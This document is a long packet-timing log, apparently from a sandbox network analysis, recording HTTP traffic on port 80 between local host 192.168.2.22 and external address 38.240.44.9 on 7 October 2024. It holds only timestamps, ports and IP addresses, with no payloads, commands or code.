                                                                                                                                                                    Oct 7, 2024 14:53:15.292659998 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.292671919 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.292685986 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.292694092 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.292701960 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.292711973 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.292712927 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.292725086 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.292733908 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.292757034 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.292766094 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.292779922 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.292813063 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.293359995 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.293416977 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.293431044 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.293458939 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.293477058 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.293488026 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.293498993 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.293509960 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.293517113 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.293534994 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.293724060 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.293737888 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.293747902 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.293757915 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.293770075 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.293792009 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.294318914 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.294352055 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.294365883 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.294388056 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.294410944 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.294423103 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.294433117 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.294444084 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.294456959 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.294472933 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.294526100 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.294576883 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.295038939 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.295053959 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.295066118 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.295089006 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.295101881 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.295116901 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.295128107 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.295136929 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.295140028 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.295161963 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.295211077 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.295224905 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.295237064 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.295238972 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.295248985 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.295272112 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.296017885 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.296056032 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.296058893 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.296067953 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.296103954 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.486296892 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486314058 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486325026 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486335039 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486347914 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486357927 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486368895 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486378908 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486391068 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486392021 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.486406088 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.486426115 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486429930 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.486438036 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486453056 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486466885 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486474991 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.486524105 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.486639977 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486716032 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486732960 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486753941 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486763954 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486768961 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.486774921 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.486813068 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.487019062 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487071037 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487083912 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487108946 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.487139940 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487152100 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487164021 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487185955 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.487469912 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487483025 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487493038 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487519026 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.487569094 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487581015 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487591028 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487601995 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487612963 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487613916 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.487624884 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487634897 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487637997 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.487659931 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.487714052 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487726927 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487740993 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.487759113 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.488281965 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.488296032 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.488307953 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.488329887 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.488337994 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.488351107 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.488362074 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.488373995 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.488389969 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.488414049 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.488502979 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.488517046 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.488528013 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.488538980 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.488550901 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.488553047 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.488563061 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.488574028 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.488575935 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.488596916 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.489178896 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.489231110 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.489234924 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.489248037 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.489279985 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.489291906 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.489303112 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.489343882 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.491494894 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.491544962 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.491556883 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.491565943 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.491580963 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.491606951 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680147886 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680171967 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680183887 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680193901 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680207014 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680217028 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680242062 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680260897 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680264950 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680264950 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680273056 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680283070 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680294037 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680301905 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680305004 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680316925 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680316925 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680345058 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680408001 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680418968 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680425882 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680435896 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680448055 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680459976 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680461884 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680484056 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680577993 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680589914 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680599928 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680610895 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680624962 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680630922 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680644989 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680653095 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680665016 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680675030 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680690050 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680697918 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680718899 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680737972 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680742025 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680752993 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680763006 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680773973 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680790901 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680797100 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680808067 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680815935 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680835962 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680847883 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680885077 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680896044 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680957079 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680969000 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680969000 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.680979967 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680998087 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.680999994 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.681027889 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681039095 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681066036 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.681175947 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681186914 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681197882 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681210041 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681221008 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681222916 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.681233883 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681242943 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.681246042 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681272030 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.681380033 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681391001 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681401968 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681413889 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681425095 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681425095 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.681436062 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681447029 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.681447983 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681458950 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681471109 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681472063 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.681483030 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.681493998 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.681519032 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.685316086 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685350895 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685364962 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685378075 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685389996 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685399055 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.685415983 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.685463905 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685476065 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685487986 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685499907 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685520887 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.685534000 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.685595989 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685609102 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685620070 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685635090 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685643911 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.685657024 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685667992 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685674906 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.685679913 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685691118 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685700893 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.685703039 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.685719967 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.873698950 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.873744965 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.873761892 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.873778105 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.873792887 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.873804092 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.873814106 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.873821020 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.873825073 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.873842955 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.873913050 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.873924017 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.873934031 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.873944044 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.873954058 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.873955011 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.873965025 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.873975992 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.873986006 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.873994112 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.873996019 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.874001980 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.874018908 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.874072075 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.874073982 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.874082088 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.874090910 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.874105930 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.874110937 CEST4917680192.168.2.2238.240.44.9
                                                                                                                                                                    Oct 7, 2024 14:53:15.874116898 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.874126911 CEST804917638.240.44.9192.168.2.22
                                                                                                                                                                    Oct 7, 2024 14:53:15.874136925 CEST804917638.240.44.9192.168.2.22
